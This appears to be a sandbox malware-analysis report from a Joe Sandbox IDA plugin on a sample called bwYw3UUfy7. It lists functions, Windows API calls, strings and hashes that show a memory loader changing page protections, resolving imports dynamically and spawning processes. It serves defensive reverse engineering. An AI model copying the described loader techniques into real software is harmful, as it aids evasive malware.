Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
String ID: >y$dMy
API String ID: 3094916012-2497946052
Opcode ID: eb09ca0bd929b1af09ec2d944b9763ea084b6bfb31a634ed9f2ea7e122674a50
Instruction ID: 179ba1d44309baefe9466c59d444f7d688aee811de957d64feda6fbcc915bc1d
Opcode Fuzzy Hash: eb09ca0bd929b1af09ec2d944b9763ea084b6bfb31a634ed9f2ea7e122674a50
Instruction Fuzzy Hash: 1871AAB4A016008EDBC5DFB9AC4EA553BE1FB89370744823EE15ADB2B2EB344505CF44

Function 008A2750 Relevance: 7.7, APIs: 5, Instructions: 206
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 008A288A
GetProcAddress.KERNEL32(?,0089BFF9), ref: 008A28A8
ExitProcess.KERNEL32(?,0089BFF9), ref: 008A28B9
VirtualProtect.KERNELBASE(00730000,00001000,00000004,?,00000000), ref: 008A2907
VirtualProtect.KERNELBASE(00730000,00001000), ref: 008A291C

Memory Dump Source

Source File: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: 8a5c4a944bcc9c2d91ab1b41c8d196508689ddbfc0f58ffbaa7fd90d2449cbd9
Instruction ID: 5c459ec9eb90acedc2a57909ab65883dbdec2040d5db9565b207b36b30a0442f
Opcode Fuzzy Hash: 8a5c4a944bcc9c2d91ab1b41c8d196508689ddbfc0f58ffbaa7fd90d2449cbd9
Instruction Fuzzy Hash: C351F672A543564BF7309EBCCC806747790FB533247280738D9E2C7BC6E7A8590687A0

Function 0171F370 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0171F260: Sleep.KERNELBASE(000001F4), ref: 0171F271

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0171F460

Strings

JGNCZIO2VFEL0TD, xrefs: 0171F4E0, 0171F4E3

Memory Dump Source

Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID: CreateFileSleep
String ID: JGNCZIO2VFEL0TD
API String ID: 2694422964-861957299
Opcode ID: fe90c346ca207db0cf0934c1b03f29988b72393c2ffff545f839642abd04fc19
Instruction ID: 78210ede7e8edec556808907fb69dbb74b14e8df189ce1bebc1ff43179791917
Opcode Fuzzy Hash: fe90c346ca207db0cf0934c1b03f29988b72393c2ffff545f839642abd04fc19
Instruction Fuzzy Hash: 47518031D4425ADBEF11DBA8C818BEEBB78AF14300F004598E609BB2C5D7791B49CBA5

Function 00733B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00733B0F,SwapMouseButtons,00000004,?), ref: 00733B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00733B0F,SwapMouseButtons,00000004,?,?,?,?,00734D9C), ref: 00733B61
RegCloseKey.KERNELBASE(00000000,?,?,00733B0F,SwapMouseButtons,00000004,?,?,?,?,00734D9C), ref: 00733B83

Strings

Control Panel\Mouse, xrefs: 00733B3E

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 72788f8368eb5e3dbae0d5156dda568686c9e4a840fabae2ca726387afed99b0
Instruction ID: a7adda8e495c5923ba5545fbb53ba9c73305d081fe4de8130fd57e4e69f580ea
Opcode Fuzzy Hash: 72788f8368eb5e3dbae0d5156dda568686c9e4a840fabae2ca726387afed99b0
Instruction Fuzzy Hash: 3E1127B5610208FFEB218FA5DC84EAEBBB8EF04744F10846AE805E7111E2359E409BA4

Function 0073DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 007832B7

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: fbb5cc893012e6c8d90e710bba2e7106a6481cd0103efae21dc440b5616b11f2
Instruction ID: edab7f84e2e05d623ff14a6b5112f852e7854f89cf4758a43019c73fecb9f1f3
Opcode Fuzzy Hash: fbb5cc893012e6c8d90e710bba2e7106a6481cd0103efae21dc440b5616b11f2
Instruction Fuzzy Hash: 5DC2AC71E00214CFEB24DF58C884AADB7B1FF09710F248569E956AB392D379ED81CB91

Function 0074FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00750668

Part of subcall function 007532A4: RaiseException.KERNEL32(?,?,?,0075068A,?,008013F0,?,?,?,?,?,?,0075068A,?,007F8738), ref: 00753304

__CxxThrowException@8.LIBVCRUNTIME ref: 00750685

Strings

Unknown exception, xrefs: 00750692

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: a5e2ab3be2bddfd526c48f3374b1d539957a70870e1d1147d95a99331b940e46
Instruction ID: 3cd657288d70a6d7f7e53528315cfdcfba9e8e3dde11c0b73d8601b82da9227f
Opcode Fuzzy Hash: a5e2ab3be2bddfd526c48f3374b1d539957a70870e1d1147d95a99331b940e46
Instruction Fuzzy Hash: FCF0FF24A0020DA38B04BAA4D85ADEE776CAE00351B604431FD24825A2EFF9DA6DC9D1

Function 0171DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0171E005
ExitProcess.KERNEL32(00000000), ref: 0171E024

Strings

D, xrefs: 0171DFD1

Memory Dump Source

Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: e5dfa926c3cfd43f8158a8dca75bcf8ff518f9dd03fead9f205cfafa536a5c87
Instruction ID: 54b20d80014ce18cc914ed68ce7629248def5b198ba8a5c6ca06b8c8433b475a
Opcode Fuzzy Hash: e5dfa926c3cfd43f8158a8dca75bcf8ff518f9dd03fead9f205cfafa536a5c87
Instruction Fuzzy Hash: 06F0EC7154024DABDB60DFE4CC49FEEB77CBF04701F148508FA1A9A184DA7496088B61

Function 0079C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00733923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00733A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0079C259
KillTimer.USER32(?,00000001,?,?), ref: 0079C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0079C270

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 9906ee193d5d59ea3d99e291f644b218428aabc9c7616a6752520c3af6612d97
Instruction ID: e9ad80e29847f233a90b5849aa59d201d819357dfa47e62800baa043f92dbd4c
Opcode Fuzzy Hash: 9906ee193d5d59ea3d99e291f644b218428aabc9c7616a6752520c3af6612d97
Instruction Fuzzy Hash: E531B170904384AFEF238B649859BE6BBECAB06308F00449ED69E93241C3786A84CB51

Function 0073DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0073DB7B
DispatchMessageW.USER32(?), ref: 0073DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0073DB9F
Sleep.KERNEL32(0000000A), ref: 0073DBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 00781CC9

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 1013870856db37083ff2d53244206bdbfe7c2dafceea0c26c041d8085e609d51
Instruction ID: 3cfcadd366b871a75e6027f861f1bf4c111524e06b42cae399188463771b4f11
Opcode Fuzzy Hash: 1013870856db37083ff2d53244206bdbfe7c2dafceea0c26c041d8085e609d51
Instruction Fuzzy Hash: 67F0FE716443449BEB70DBA0DC89FEA73ACEB45310F508929E65AC70D0DB38A5499B25

Function 0171E030 Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 0171D8A0: GetFileAttributesW.KERNELBASE(?), ref: 0171D8AB

CreateDirectoryW.KERNELBASE(?,00000000), ref: 0171E168

Memory Dump Source

Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 8c3ce138291b545df4653fb298d75bf30b3e451207d744e525b69a75ab9dd604
Instruction ID: 63da74a16b4dc6d7dfad879fdbf1b1009422cf2562bc51ef253d700fe63fb080
Opcode Fuzzy Hash: 8c3ce138291b545df4653fb298d75bf30b3e451207d744e525b69a75ab9dd604
Instruction Fuzzy Hash: C8519A31A1010997EF14EFB4C954BEFB339EF58700F0045A9EA09E7184EB799B45CB65

Function 0074FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0074FD1F

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 20db23775e153a251d3f755fe6e0cc1b055154f9f3ffb452507413aaad83c14f
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: FE31D275A00109DBC718DF69D4D0A69FBA6FF49300B2486A5E80ACB656D735EDC1CBD0

Function 00736B57 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00736B6A

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 7e15529507eac6aea1fbda02680e7474980962aa3106806d9607dbaad6d2b87b
Instruction ID: 97fdf724c2f7a572c1113245e355f348a2d997b4593f44b6d4306887ad10dabd
Opcode Fuzzy Hash: 7e15529507eac6aea1fbda02680e7474980962aa3106806d9607dbaad6d2b87b
Instruction Fuzzy Hash: 4A11C6B2204605EEDB119F28D806F19B7D4AF44750F30C52EF55ACA5E2D779E8408B44

Function 00763820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004), ref: 00763852

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c3614486f16d79cbab949bd1fa500afc579eb9aad3fbb19728c74284296008a3
Instruction ID: f65d51c308548e16457a168eb146c0ee0b2dcac3a6dbaf2f66befd49edc962af
Opcode Fuzzy Hash: c3614486f16d79cbab949bd1fa500afc579eb9aad3fbb19728c74284296008a3
Instruction Fuzzy Hash: B0E0E5321002269AE62127A79C09BDA3749AB427B1F090022FC0793581CB5CDD01C2F0

Function 00733AA2 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00733A97,?,?,?,0073351C,?,?,?,?,0073106A), ref: 00733AC2

Part of subcall function 00736B57: _wcslen.LIBCMT ref: 00736B6A

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: FullNamePath_wcslen
String ID:
API String ID: 4019309064-0
Opcode ID: 14e4b3c705b62ee80682b142c4168494bc3bf0c0905d2c9fe6046f35d03a61bb
Instruction ID: 32dd68e615ebfc01de6ddce12851d86ec15f34daaae6d1a87a8490c6e7bcdb95
Opcode Fuzzy Hash: 14e4b3c705b62ee80682b142c4168494bc3bf0c0905d2c9fe6046f35d03a61bb
Instruction Fuzzy Hash: 6AE0D8A0304314A6EA11A3548C0BFF9335C9B44F80F404064F989E2286DE5C9E408666

Function 00732DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00732DC4

Part of subcall function 00736B57: _wcslen.LIBCMT ref: 00736B6A

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: b6ecde183fb6b3e451b8c108207007a0f2d6e72b36f87e7d3532885be2a5fd88
Instruction ID: 3cdc1eb6930b43cf588cf938bb6e6379973f12547d5ffaf5a82e07634b6dd501
Opcode Fuzzy Hash: b6ecde183fb6b3e451b8c108207007a0f2d6e72b36f87e7d3532885be2a5fd88
Instruction Fuzzy Hash: B2E0CDB2A001245BDB1192589C09FDA77DDDFC87D0F044075FD0DD7248D964AD808650

Function 00732B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00733837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00733908

Part of subcall function 0073D730: GetInputState.USER32 ref: 0073D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00732B6B

Part of subcall function 007330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0073314E

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: d4dd7bc62b2a0907986ea6cdc2efcdc7d9e37d09c46d2d1a7f83658edfa70749
Instruction ID: 41ff34e1acbea2b0fb556ae5a74433cf98195b553c5bf99b1f433f6ea271ef57
Opcode Fuzzy Hash: d4dd7bc62b2a0907986ea6cdc2efcdc7d9e37d09c46d2d1a7f83658edfa70749
Instruction Fuzzy Hash: D6E07D3130424483EE18BB70A85E4BDF34ADBD1321F00043EF242831B3CF2C89494352

Function 0171D8A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 0171D8AB

Memory Dump Source

Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: cf92b0789c34568b65377b0c3ade934dc8b1c773f8a3ac875ba60090090e6ec9
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 22E08C30A65308EBDB34CBECC808AEAB3A8DB05320F004A94ED0AC3284D5309A449A14

Function 0171D870 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 0171D87B

Memory Dump Source

